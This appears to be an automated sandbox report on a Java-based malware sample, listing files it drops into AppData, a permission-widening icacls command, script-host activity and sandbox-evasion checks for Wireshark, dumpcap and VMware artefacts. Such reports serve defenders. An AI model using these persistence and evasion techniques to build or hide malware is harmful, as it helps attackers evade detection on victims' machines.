          Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
          Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdb source: javaw.exe, 00000009.00000002.602787359.00000000702E6000.00000002.00020000.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmp
          Source: Binary string: C:\Users\Win10\Desktop\RetriveTitle_vb2010\Release\TitleWindow.pdb source: javaw.exe, 00000009.00000002.592935649.000000000A16B000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.590464923.0000000004881000.00000004.00000001.sdmp
          Source: Binary string: b.pxb.ppb.phb.pXb.pDb.p8b.p,b.p source: javaw.exe, 00000009.00000002.602797426.00000000702E9000.00000004.00020000.sdmp
          Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\x64\Release\CryptUtil.pdb source: javaw.exe, 00000009.00000002.592935649.000000000A16B000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmp
          Source: Binary string: C:\Users\Windows10\Desktop\RetriveTitle\x64\Release\TitleWindow.pdb source: javaw.exe, 00000009.00000002.592935649.000000000A16B000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmp
          Source: Binary string: C:\Users\Windows10\Desktop\RetriveTitle\x64\Release\TitleWindow.pdb source: javaw.exe, 00000009.00000002.592935649.000000000A16B000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmp
          Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdbP8PP@Y source: javaw.exe, 00000009.00000002.602787359.00000000702E6000.00000002.00020000.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmp
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_2_02CBB377 push 00000000h; mov dword ptr [esp], esp
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_2_02CBBB27 push 00000000h; mov dword ptr [esp], esp
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_2_02CBA1CA push ecx; ret
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_2_02CBA1DB push ecx; ret
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_2_02CBB907 push 00000000h; mov dword ptr [esp], esp
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_2_02CBC437 push 00000000h; mov dword ptr [esp], esp
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_2_02CC2D44 push eax; retf
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_2_02D60315 push cs; retf
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_2_02D59891 push cs; retf
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 9_3_1572CF33 push eax; iretd
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 9_3_14F5DC8C push E814F5CAh; retf
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 9_3_14F5BE7C push E814F5CAh; retf
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 9_3_14F65459 push ds; retf
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 9_3_14F5CB1B push E814F5CDh; retf
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 10_3_1529CB0C pushad ; retf
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exe
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exeJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font_t2k.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exe
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exe
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\glass.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exe
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\client\jvm.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exe
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge-32.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jawt.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exeJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-2-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exeJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\java.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exe
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\sunec.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\eula.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\bci.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exe
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\vcruntime140.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exe
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exe
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\verify.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcr100.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-util-l1-1-0.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeFile created: C:\Users\user\AppData\Local\Temp\Windows278170804881636675.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\java.exeJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\zip.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\resource.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exeJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l2-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\ucrtbase.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exe
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\msvcr100.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeFile created: C:\Users\user\AppData\Local\Temp\sqlite-3.8.11.2-42eaffe0-b8ea-4880-ab72-6ea9a41a3e14-sqlitejdbc.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exe
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\nio.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\net.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exe
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\concrt140.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exeJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\awt.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\management.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exe
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\sunmscapi.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dll
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\klist.exe
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dll
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeFile created: C:\Users\user\AppData\Local\Temp\Windows9046764930049020633.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cplJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exe
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-string-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cplJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\README.txt
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt
          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt
          Source: C:\Windows\SysWOW64\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\regedit.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: SUPERANTISPYWARE.EXE
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
          Source: C:\Windows\SysWOW64\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exe
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exeJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font_t2k.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exe
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exe
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\glass.dllJump to dropped file
